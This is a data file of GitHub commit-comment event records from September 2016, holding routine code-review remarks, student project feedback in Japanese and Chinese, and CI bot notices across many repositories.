{"id":"4525269232","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"miurahiroki/ToDoList"},"payload":{"comment":{"id":18922719,"position":null,"line":null,"path":null,"commit_id":"b0b9c3c4111bf9937e2d92eca31032fe6bf6f88c","created_at":"2016-09-07T03:47:39Z","updated_at":"2016-09-07T03:47:39Z","body":"👍"}},"created_at":"2016-09-07T03:47:39Z"}
{"id":"4525270193","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"furufumi/ToDoList"},"payload":{"comment":{"id":18922725,"position":null,"line":null,"path":null,"commit_id":"11a3ccb2ff5960714467e2a068a4633c47bcf0a0","created_at":"2016-09-07T03:48:04Z","updated_at":"2016-09-07T03:48:04Z","body":"かわいすぎかっ！！！\r\n本当にかわうぃー( *´艸｀)\r\nキティちゃんモチーフ？"}},"created_at":"2016-09-07T03:48:04Z"}
{"id":"4525270297","type":"CommitCommentEvent","actor":{"login":"jwhui"},"repo":{"name":"openthread/openthread"},"payload":{"comment":{"id":18922726,"position":29,"line":61,"path":"examples/platforms/cc2538/random.c","commit_id":"57e3fba2ffe89ca8510523fb3224963ebb15c1f4","created_at":"2016-09-07T03:48:07Z","updated_at":"2016-09-07T03:48:07Z","body":"You probably want to shift before setting the LSB.  What you have here will always result in the LSB being 0."}},"created_at":"2016-09-07T03:48:07Z"}
{"id":"4525274373","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"yasuda-yuka/ToDoList"},"payload":{"comment":{"id":18922735,"position":null,"line":null,"path":null,"commit_id":"4265e1f87152545d4f689a558bb3de75a3c1f263","created_at":"2016-09-07T03:49:51Z","updated_at":"2016-09-07T03:49:51Z","body":"訳があってわかりやすいっすね"}},"created_at":"2016-09-07T03:49:51Z"}
{"id":"4525275066","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"hiroki-fujihara/ToDoList2"},"payload":{"comment":{"id":18922736,"position":null,"line":null,"path":null,"commit_id":"332389440a51848f687b9e9363b9c4037d9d12d7","created_at":"2016-09-07T03:50:08Z","updated_at":"2016-09-07T03:50:08Z","body":"作業中が赤いのが良い👍\r\nでも必ずしも作業ではないかもしれない！\r\n文字の大きさの変化が良い👍\r\nでもデータ件数少ないとゲシュタルト崩壊しそうだから上か下かどっちか小さくしたがいいかも\r\n表になってるのがいい👍\r\n"}},"created_at":"2016-09-07T03:50:08Z"}
{"id":"4525275135","type":"CommitCommentEvent","actor":{"login":"weimengxi"},"repo":{"name":"postcss/postcss-color-rgba-fallback"},"payload":{"comment":{"id":18922737,"position":34,"line":31,"path":"index.js","commit_id":"b6200db17ed1c0ab197664a366b115cbd711eb0a","created_at":"2016-09-07T03:50:10Z","updated_at":"2016-09-07T03:50:10Z","body":"when we use `border(-[top|right|bottom|left])?(-[style|color])?`， it won't pass through the rgba fallback again. \r\n\r\nwhat about\r\n\r\n `properties.some( (prop, index, properties) => {\r\n    return decl.prop.startsWith(prop);\r\n})`\r\n"}},"created_at":"2016-09-07T03:50:10Z"}
{"id":"4525276156","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/Helooday01"},"payload":{"comment":{"id":18922738,"position":12,"line":12,"path":"text.txt","commit_id":"700eb3ba05c4d2255371c0efdffae338ad63955f","created_at":"2016-09-07T03:50:29Z","updated_at":"2016-09-07T03:50:29Z","body":"hood\r\nwelie"}},"created_at":"2016-09-07T03:50:29Z"}
{"id":"4525276435","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/Helooday01"},"payload":{"comment":{"id":18922740,"position":null,"line":null,"path":null,"commit_id":"700eb3ba05c4d2255371c0efdffae338ad63955f","created_at":"2016-09-07T03:50:37Z","updated_at":"2016-09-07T03:50:37Z","body":"sdf"}},"created_at":"2016-09-07T03:50:37Z"}
{"id":"4525278460","type":"CommitCommentEvent","actor":{"login":"vchuravy"},"repo":{"name":"dmlc/MXNet.jl"},"payload":{"comment":{"id":18922744,"position":15,"line":642,"path":"src/symbolic-node.jl","commit_id":"f06d9943f51fdb77b8c2841aa70258eb4dbf7f30","created_at":"2016-09-07T03:51:23Z","updated_at":"2016-09-07T03:51:23Z","body":"thanks I think the overhead might go away because this is a const comparision, but if llvm is not smart enough we can do\r\n\r\n`$(func_name_s == \"transpose\")` e.g.evaluating the condition at macro time and the llvm will do the right thing because `if false` is trivial. "}},"created_at":"2016-09-07T03:51:23Z"}
{"id":"4525279551","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/Helooday01"},"payload":{"comment":{"id":18922747,"position":8,"line":8,"path":"text.txt","commit_id":"700eb3ba05c4d2255371c0efdffae338ad63955f","created_at":"2016-09-07T03:51:51Z","updated_at":"2016-09-07T03:51:51Z","body":"s'd'fa"}},"created_at":"2016-09-07T03:51:51Z"}
{"id":"4525280230","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/Helooday01"},"payload":{"comment":{"id":18922748,"position":8,"line":8,"path":"text.txt","commit_id":"700eb3ba05c4d2255371c0efdffae338ad63955f","created_at":"2016-09-07T03:52:08Z","updated_at":"2016-09-07T03:52:08Z","body":"阿斯蒂芬"}},"created_at":"2016-09-07T03:52:08Z"}
{"id":"4525283737","type":"CommitCommentEvent","actor":{"login":"gomker"},"repo":{"name":"gomker/HullBreach"},"payload":{"comment":{"id":18922751,"position":15,"line":126,"path":"ModuleHullBreach.cs","commit_id":"8cec763b3a6a2f9724449d118765e80fe62b59da","created_at":"2016-09-07T03:53:36Z","updated_at":"2016-09-07T03:53:36Z","body":"Issue #1  No way to Zero out AFAIK , just dumping EC really fast"}},"created_at":"2016-09-07T03:53:36Z"}
{"id":"4525284501","type":"CommitCommentEvent","actor":{"login":"gomker"},"repo":{"name":"gomker/HullBreach"},"payload":{"comment":{"id":18922754,"position":28,"line":190,"path":"ModuleHullBreach.cs","commit_id":"8cec763b3a6a2f9724449d118765e80fe62b59da","created_at":"2016-09-07T03:53:54Z","updated_at":"2016-09-07T03:53:54Z","body":"Issue #2 "}},"created_at":"2016-09-07T03:53:54Z"}
{"id":"4525285414","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/Helooday01"},"payload":{"comment":{"id":18922758,"position":3,"line":5,"path":"text.txt","commit_id":"700eb3ba05c4d2255371c0efdffae338ad63955f","created_at":"2016-09-07T03:54:16Z","updated_at":"2016-09-07T03:54:16Z","body":"爱的色放"}},"created_at":"2016-09-07T03:54:16Z"}
{"id":"4525287174","type":"CommitCommentEvent","actor":{"login":"KunmyonChoi"},"repo":{"name":"enyojs/moonstone"},"payload":{"comment":{"id":18922760,"position":29,"line":23,"path":"lib/LabeledTextItem/LabeledTextItem.less","commit_id":"c9650d7a8d43987ba32b7b8d8423c8fef2d25c83","created_at":"2016-09-07T03:54:59Z","updated_at":"2016-09-07T03:54:59Z","body":"Hi @ryanjduffy ,\r\nDo you remember why we added margin-bottom: 12px; in moon-labeledtextitem-header and margin-top: -12px; in .moon-labeledtextitem-text?"}},"created_at":"2016-09-07T03:54:59Z"}
{"id":"4525289448","type":"CommitCommentEvent","actor":{"login":"weimengxi"},"repo":{"name":"postcss/postcss-color-rgba-fallback"},"payload":{"comment":{"id":18922765,"position":34,"line":31,"path":"index.js","commit_id":"b6200db17ed1c0ab197664a366b115cbd711eb0a","created_at":"2016-09-07T03:55:58Z","updated_at":"2016-09-07T03:55:58Z","body":"Maybe  we can use RegExp in options.properties "}},"created_at":"2016-09-07T03:55:58Z"}
{"id":"4525289943","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18922768,"position":null,"line":null,"path":null,"commit_id":"442af7bd8452f42476814770c9ff45aea5530049","created_at":"2016-09-07T03:56:10Z","updated_at":"2016-09-07T03:56:10Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-07T03:56:10Z"}
{"id":"4525289950","type":"CommitCommentEvent","actor":{"login":"vivekimsit"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18922769,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T03:56:10Z","updated_at":"2016-09-07T03:56:10Z","body":"Thanks, my first shot was same but I did some research with the links below:\r\n\r\nhttps://www.w3.org/TR/html5/infrastructure.html#boolean-attribute\r\n\r\nwe can't assign any value to the `disabled` attribute either it can be empty or `disabled(case insensitive) ` .\r\n\r\nAlso, I found that we have to use this attribute in constraint validation as mentioned here:\r\n\r\nhttps://www.w3.org/TR/html5/forms.html#concept-fe-disabled\r\n\r\nwhich says `If an element is disabled, it is barred from constraint validation.`\r\n\r\nwdyt?"}},"created_at":"2016-09-07T03:56:10Z"}
{"id":"4525296699","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18922785,"position":951,"line":1020,"path":"src/gui/dialogs/preferences_dialog.cpp","commit_id":"717aa892d2e52e670f6deda6182f5f4f688eac99","created_at":"2016-09-07T03:58:55Z","updated_at":"2016-09-07T03:58:55Z","body":"So it's not needed?\r\n"}},"created_at":"2016-09-07T03:58:55Z"}
{"id":"4525307677","type":"CommitCommentEvent","actor":{"login":"zhblue"},"repo":{"name":"hnshhslsh/virtual-judge"},"payload":{"comment":{"id":18922804,"position":null,"line":null,"path":null,"commit_id":"869d64ae1cbb028cc9ef0039ee05465ab04d8c8e","created_at":"2016-09-07T04:03:00Z","updated_at":"2016-09-07T04:03:00Z","body":"那万一人家更新了咋办"}},"created_at":"2016-09-07T04:03:00Z"}
{"id":"4525310686","type":"CommitCommentEvent","actor":{"login":"domonmizuki"},"repo":{"name":"domonmizuki/ToDoList2"},"payload":{"comment":{"id":18922809,"position":null,"line":null,"path":null,"commit_id":"1661a40531a6b8aaa52e602eb9aafac80ee64535","created_at":"2016-09-07T04:04:15Z","updated_at":"2016-09-07T04:04:15Z","body":"https://rocky-springs-95405.herokuapp.com/tasks"}},"created_at":"2016-09-07T04:04:15Z"}
{"id":"4525311132","type":"CommitCommentEvent","actor":{"login":"HostZero"},"repo":{"name":"COND-ORG/android_device_motorola_condor"},"payload":{"comment":{"id":18922811,"position":null,"line":null,"path":null,"commit_id":"b9c024a376be846b09257a1277eef6277ccf0864","created_at":"2016-09-07T04:04:25Z","updated_at":"2016-09-07T04:04:25Z","body":"They are Deprecated flags :) I hope."}},"created_at":"2016-09-07T04:04:25Z"}
{"id":"4525312834","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18922814,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-07T04:05:11Z","updated_at":"2016-09-07T04:05:11Z","body":"TeamCity ReOpenLDAP :: devel [Build 308](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2781&buildTypeId=ReOpenLDAP_Devel&guest=1) is now running\n"}},"created_at":"2016-09-07T04:05:11Z"}
{"id":"4525312837","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18922815,"position":null,"line":null,"path":null,"commit_id":"9109b36e0de674da39d648efedf531f82f0f9b17","created_at":"2016-09-07T04:05:11Z","updated_at":"2016-09-07T04:05:11Z","body":"TeamCity ReOpenLDAP :: devel [Build 308](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2781&buildTypeId=ReOpenLDAP_Devel&guest=1) is now running\n"}},"created_at":"2016-09-07T04:05:11Z"}
{"id":"4525316304","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":18922823,"position":4,"line":92,"path":"WowPacketParser/WowPacketParser.csproj","commit_id":"38336f4970c996457800363f2ab383d450ddd91b","created_at":"2016-09-07T04:06:37Z","updated_at":"2016-09-07T04:06:37Z","body":"Use nuget packages instead of adding .DLLs to the repo"}},"created_at":"2016-09-07T04:06:37Z"}
{"id":"4525317004","type":"CommitCommentEvent","actor":{"login":"malyarevich"},"repo":{"name":"malyarevich/codevery"},"payload":{"comment":{"id":18922825,"position":null,"line":null,"path":null,"commit_id":"2042407d8a33e14e681b7c66dd8d2c02ae87b1ef","created_at":"2016-09-07T04:06:56Z","updated_at":"2016-09-07T04:06:56Z","body":"All dir in zip.\r\n"}},"created_at":"2016-09-07T04:06:56Z"}
{"id":"4525320802","type":"CommitCommentEvent","actor":{"login":"greis"},"repo":{"name":"vnegrisolo/netflex"},"payload":{"comment":{"id":18922828,"position":null,"line":null,"path":null,"commit_id":"dbff5dfb45de68722e4b58dbf194f082ff437a2c","created_at":"2016-09-07T04:08:36Z","updated_at":"2016-09-07T04:08:36Z","body":"Gambi "}},"created_at":"2016-09-07T04:08:36Z"}
{"id":"4525322837","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922830,"position":15,"line":115,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:09:31Z","updated_at":"2016-09-07T04:09:31Z","body":"Fixed."}},"created_at":"2016-09-07T04:09:31Z"}
{"id":"4525323213","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922831,"position":30,"line":182,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:09:42Z","updated_at":"2016-09-07T04:09:42Z","body":"Fixed."}},"created_at":"2016-09-07T04:09:42Z"}
{"id":"4525323255","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":18922832,"position":55,"line":55,"path":"WowPacketParser/DBC/DBC.cs","commit_id":"38336f4970c996457800363f2ab383d450ddd91b","created_at":"2016-09-07T04:09:42Z","updated_at":"2016-09-07T04:09:42Z","body":"Fairly sure that you don't need to run this code 10 times"}},"created_at":"2016-09-07T04:09:42Z"}
{"id":"4525323561","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922833,"position":45,"line":200,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:09:50Z","updated_at":"2016-09-07T04:09:50Z","body":"Fixed."}},"created_at":"2016-09-07T04:09:50Z"}
{"id":"4525323876","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922835,"position":60,"line":214,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:09:59Z","updated_at":"2016-09-07T04:09:59Z","body":"Fixed."}},"created_at":"2016-09-07T04:09:59Z"}
{"id":"4525325847","type":"CommitCommentEvent","actor":{"login":"Stomachache007"},"repo":{"name":"Stomachache007/PencilDrawing"},"payload":{"comment":{"id":18922838,"position":31,"line":31,"path":"GenPencil.m","commit_id":"040c1699f449ac1008eaa6a6d15650515d170d52","created_at":"2016-09-07T04:10:45Z","updated_at":"2016-09-07T04:10:45Z","body":"May I ask how you get this line? \r\nIn the paper (http://www.cse.cuhk.edu.hk/leojia/projects/pencilsketch/npar12_pencil.pdf) it is equation (8), its differential equation should be: \r\n(β*)' = β·lnH·lnH - lnJ·lnH + λ·∇β·(∇β)'\r\nthen I can't match it with your code afterwards."}},"created_at":"2016-09-07T04:10:45Z"}
{"id":"4525325899","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":18922840,"position":5,"line":19,"path":"WowPacketParser/Misc/StoreGetters.cs","commit_id":"38336f4970c996457800363f2ab383d450ddd91b","created_at":"2016-09-07T04:10:46Z","updated_at":"2016-09-07T04:10:46Z","body":"This switch should be skipped if Settings.UseDBC is false"}},"created_at":"2016-09-07T04:10:46Z"}
{"id":"4525326241","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922841,"position":64,"line":218,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:10:54Z","updated_at":"2016-09-07T04:10:54Z","body":"Fixed. Thanks for your suggestion. "}},"created_at":"2016-09-07T04:10:54Z"}
{"id":"4525326769","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922842,"position":65,"line":219,"path":"pulseguardian/guardian.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:11:11Z","updated_at":"2016-09-07T04:11:11Z","body":"Fixed. "}},"created_at":"2016-09-07T04:11:11Z"}
{"id":"4525327521","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":18922843,"position":5,"line":50,"path":"WowPacketParser/Misc/Settings.cs","commit_id":"38336f4970c996457800363f2ab383d450ddd91b","created_at":"2016-09-07T04:11:31Z","updated_at":"2016-09-07T04:11:31Z","body":"`\"DbcPath\"` -> `\"DBCPath\"`"}},"created_at":"2016-09-07T04:11:31Z"}
{"id":"4525329256","type":"CommitCommentEvent","actor":{"login":"iMaruf"},"repo":{"name":"iMaruf/JavaBasicLearnning"},"payload":{"comment":{"id":18922844,"position":null,"line":null,"path":null,"commit_id":"41e0a832a34048b4328c9276fb1bd63ae93884e8","created_at":"2016-09-07T04:12:17Z","updated_at":"2016-09-07T04:12:17Z","body":"I got it.Thank you for your feedback."}},"created_at":"2016-09-07T04:12:17Z"}
{"id":"4525330994","type":"CommitCommentEvent","actor":{"login":"walterpinson"},"repo":{"name":"chaijs/chai"},"payload":{"comment":{"id":18922846,"position":null,"line":null,"path":null,"commit_id":"b826feba514a6caa1f2fa5103e6e16a310a1a7bb","created_at":"2016-09-07T04:13:04Z","updated_at":"2016-09-07T04:13:04Z","body":"Yeah.  Why reverted?  I have the same curiosity."}},"created_at":"2016-09-07T04:13:04Z"}
{"id":"4525332312","type":"CommitCommentEvent","actor":{"login":"jakubhava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":18922848,"position":90,"line":108,"path":"repl/src/main/scala/org/apache/spark/repl/h2o/BaseH2OInterpreter.scala","commit_id":"59ce26e89d9f195f3f0fac742a0ab9ac609d02d0","created_at":"2016-09-07T04:13:38Z","updated_at":"2016-09-07T04:13:38Z","body":"Yup, but this should work, i tried to simplify the process for our needs. I'll look at it in a bit and let you know. It's possible that I missed something "}},"created_at":"2016-09-07T04:13:38Z"}
{"id":"4525332448","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18922849,"position":null,"line":null,"path":null,"commit_id":"48204538206865830b3c2a635a02aa9d90675e01","created_at":"2016-09-07T04:13:39Z","updated_at":"2016-09-07T04:13:39Z","body":"Is this the complete patch? Looks NFC"}},"created_at":"2016-09-07T04:13:39Z"}
{"id":"4525334985","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922858,"position":20,"line":92,"path":"pulseguardian/static/js/profile.js","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:14:47Z","updated_at":"2016-09-07T04:14:47Z","body":"It's used on below lines of code (setInterval function). Leave it for now, I am working on the UI. "}},"created_at":"2016-09-07T04:14:47Z"}
{"id":"4525335050","type":"CommitCommentEvent","actor":{"login":"saintstack"},"repo":{"name":"xfxyjwf/protobuf"},"payload":{"comment":{"id":18922859,"position":null,"line":null,"path":null,"commit_id":"ed3ecd9693b6918630362727caf0bd3f1731cb03","created_at":"2016-09-07T04:14:48Z","updated_at":"2016-09-07T04:14:48Z","body":"Any suggestions for an alternate means of how to do zero-copy? We can do millions and millions of these copies a second of stuff we know is immutable. Let me know if a better forum for this."}},"created_at":"2016-09-07T04:14:48Z"}
{"id":"4525336881","type":"CommitCommentEvent","actor":{"login":"hnshhslsh"},"repo":{"name":"hnshhslsh/virtual-judge"},"payload":{"comment":{"id":18922868,"position":null,"line":null,"path":null,"commit_id":"869d64ae1cbb028cc9ef0039ee05465ab04d8c8e","created_at":"2016-09-07T04:15:34Z","updated_at":"2016-09-07T04:15:34Z","body":"@zhblue 手动删pdf文件吧😂//这种题一般不会更新吧"}},"created_at":"2016-09-07T04:15:34Z"}
{"id":"4525341112","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922873,"position":36,"line":108,"path":"pulseguardian/static/js/profile.js","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:17:21Z","updated_at":"2016-09-07T04:17:21Z","body":"hmmm, don't remember why I do that :(. The function looks like unnecessary, removed. "}},"created_at":"2016-09-07T04:17:21Z"}
{"id":"4525341621","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922875,"position":39,"line":79,"path":"pulseguardian/templates/queues_listing.html","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:17:33Z","updated_at":"2016-09-07T04:17:33Z","body":"Fixed."}},"created_at":"2016-09-07T04:17:33Z"}
{"id":"4525341877","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922876,"position":7,"line":29,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:17:41Z","updated_at":"2016-09-07T04:17:41Z","body":"Fixed."}},"created_at":"2016-09-07T04:17:41Z"}
{"id":"4525342047","type":"CommitCommentEvent","actor":{"login":"xsacha"},"repo":{"name":"hunter-packages/libssh2"},"payload":{"comment":{"id":18922877,"position":6,"line":69,"path":"src/CMakeLists.txt","commit_id":"8bbf2d74516273584db9d72c76ba31da86aef700","created_at":"2016-09-07T04:17:46Z","updated_at":"2016-09-07T04:17:46Z","body":"Maybe use old method of ${OPENSSL_LIBRARIES} if(NOT TARGET OpenSSL::Crypto)\r\notherwise use new method"}},"created_at":"2016-09-07T04:17:46Z"}
{"id":"4525347871","type":"CommitCommentEvent","actor":{"login":"MANIKANDAN27"},"repo":{"name":"MANIKANDAN27/MANIKANDAN-L"},"payload":{"comment":{"id":18922888,"position":null,"line":null,"path":null,"commit_id":"e495f9e97a18669737f2cb54f5b7bd34fb50de1e","created_at":"2016-09-07T04:20:25Z","updated_at":"2016-09-07T04:20:25Z","body":"hi"}},"created_at":"2016-09-07T04:20:25Z"}
{"id":"4525348677","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922891,"position":20,"line":124,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:20:46Z","updated_at":"2016-09-07T04:20:46Z","body":"I don't think this code is on right position, move to load_user function. "}},"created_at":"2016-09-07T04:20:46Z"}
{"id":"4525349177","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922893,"position":101,"line":263,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:20:58Z","updated_at":"2016-09-07T04:20:58Z","body":"Fixed."}},"created_at":"2016-09-07T04:20:58Z"}
{"id":"4525351323","type":"CommitCommentEvent","actor":{"login":"hnshhslsh"},"repo":{"name":"hnshhslsh/virtual-judge"},"payload":{"comment":{"id":18922896,"position":null,"line":null,"path":null,"commit_id":"869d64ae1cbb028cc9ef0039ee05465ab04d8c8e","created_at":"2016-09-07T04:21:53Z","updated_at":"2016-09-07T04:21:53Z","body":"@zhblue 主要是这个跟CFgym用的同一套逻辑，然后CFgym一套题在一个pdf上，每次抓去都下的话，挂一套题会下载很多次，文件又大，又不知道怎么按照时间判断该不该更新，所以加了个已存在直接跳过的逻辑。。。"}},"created_at":"2016-09-07T04:21:53Z"}
{"id":"4525354525","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18922901,"position":null,"line":null,"path":null,"commit_id":"2a7129f96a61164d25fe362c2f72715cf7d19aba","created_at":"2016-09-07T04:23:12Z","updated_at":"2016-09-07T04:23:12Z","body":"@locutus2 That was an ugly mistake... I always check that while approving... missed it for my own test :(\r\nThanks for pointing out!"}},"created_at":"2016-09-07T04:23:12Z"}
{"id":"4525355088","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922902,"position":115,"line":284,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:23:24Z","updated_at":"2016-09-07T04:23:24Z","body":"Fixed. Thanks for your recommandation. "}},"created_at":"2016-09-07T04:23:24Z"}
{"id":"4525355344","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922904,"position":118,"line":287,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:23:31Z","updated_at":"2016-09-07T04:23:31Z","body":"Fixed."}},"created_at":"2016-09-07T04:23:31Z"}
{"id":"4525355453","type":"CommitCommentEvent","actor":{"login":"jaff20"},"repo":{"name":"jsinghfoss/opencsv"},"payload":{"comment":{"id":18922905,"position":null,"line":null,"path":null,"commit_id":"01e57355f44c993ee5b4e9f5d756e899d7eae2c9","created_at":"2016-09-07T04:23:34Z","updated_at":"2016-09-07T04:23:34Z","body":"Hi, Thanks for the code... I am trying to implement for my small task... it works well, However it return null when i modify the Column name to say First_Name (for _ )\r\n\r\neven thought i see the correct // Create an array of column names to be read with array\r\n        String[] columnsToMap = new String[] {\"First_Name \"};\r\n\r\nJust wondering where its going wrong... ?"}},"created_at":"2016-09-07T04:23:34Z"}
{"id":"4525355835","type":"CommitCommentEvent","actor":{"login":"yaoweizhen"},"repo":{"name":"yaoweizhen/pulseguardian"},"payload":{"comment":{"id":18922908,"position":146,"line":315,"path":"pulseguardian/web.py","commit_id":"13cd2357d802caafbddf5d72fdd0702f6c2bc484","created_at":"2016-09-07T04:23:44Z","updated_at":"2016-09-07T04:23:44Z","body":"Fixed."}},"created_at":"2016-09-07T04:23:44Z"}
{"id":"4525357324","type":"CommitCommentEvent","actor":{"login":"zhblue"},"repo":{"name":"hnshhslsh/virtual-judge"},"payload":{"comment":{"id":18922911,"position":null,"line":null,"path":null,"commit_id":"869d64ae1cbb028cc9ef0039ee05465ab04d8c8e","created_at":"2016-09-07T04:24:25Z","updated_at":"2016-09-07T04:24:25Z","body":"也许http header 里面有 Last Modified"}},"created_at":"2016-09-07T04:24:25Z"}
{"id":"4525363460","type":"CommitCommentEvent","actor":{"login":"zhanglihang"},"repo":{"name":"zhanglihang/content"},"payload":{"comment":{"id":18922922,"position":5,"line":5,"path":"test.php","commit_id":"298e848d131dab8eceee48cd751b32b008668322","created_at":"2016-09-07T04:26:56Z","updated_at":"2016-09-07T04:26:56Z","body":"<title>0</title>"}},"created_at":"2016-09-07T04:26:56Z"}
{"id":"4525363659","type":"CommitCommentEvent","actor":{"login":"sapkotabishal10"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922923,"position":null,"line":null,"path":null,"commit_id":"e96728c68f388347211f54ed817dca023f070b30","created_at":"2016-09-07T04:27:01Z","updated_at":"2016-09-07T04:27:01Z","body":"Good job Pujan. I think some comments are still missing so can you check on that please. Except that everything looks fine and clear to the viewers. This patch is ready to me merged to the main patch."}},"created_at":"2016-09-07T04:27:01Z"}
{"id":"4525366213","type":"CommitCommentEvent","actor":{"login":"zhanglihang"},"repo":{"name":"zhanglihang/content"},"payload":{"comment":{"id":18922926,"position":5,"line":5,"path":"test.php","commit_id":"298e848d131dab8eceee48cd751b32b008668322","created_at":"2016-09-07T04:28:04Z","updated_at":"2016-09-07T04:28:04Z","body":"<title>无标题文档</title>"}},"created_at":"2016-09-07T04:28:04Z"}
{"id":"4525367203","type":"CommitCommentEvent","actor":{"login":"victorgama"},"repo":{"name":"d3estudio/zag-app-web"},"payload":{"comment":{"id":18922928,"position":5,"line":6,"path":"tools/server.js","commit_id":"5b4dabf1f20c49329fefd9da318ac9f188d5d476","created_at":"2016-09-07T04:28:29Z","updated_at":"2016-09-07T04:28:29Z","body":"@mathportillo Comentei essa linha, que talvez deva ser removida. Variáveis de ambiente deverão ser fornecidas pelo container e acessadas via `process.env`, o que faz com que isso não seja necessário. Talvez vocês também queiram se livrar do `dotenv` como dependência. :)"}},"created_at":"2016-09-07T04:28:29Z"}
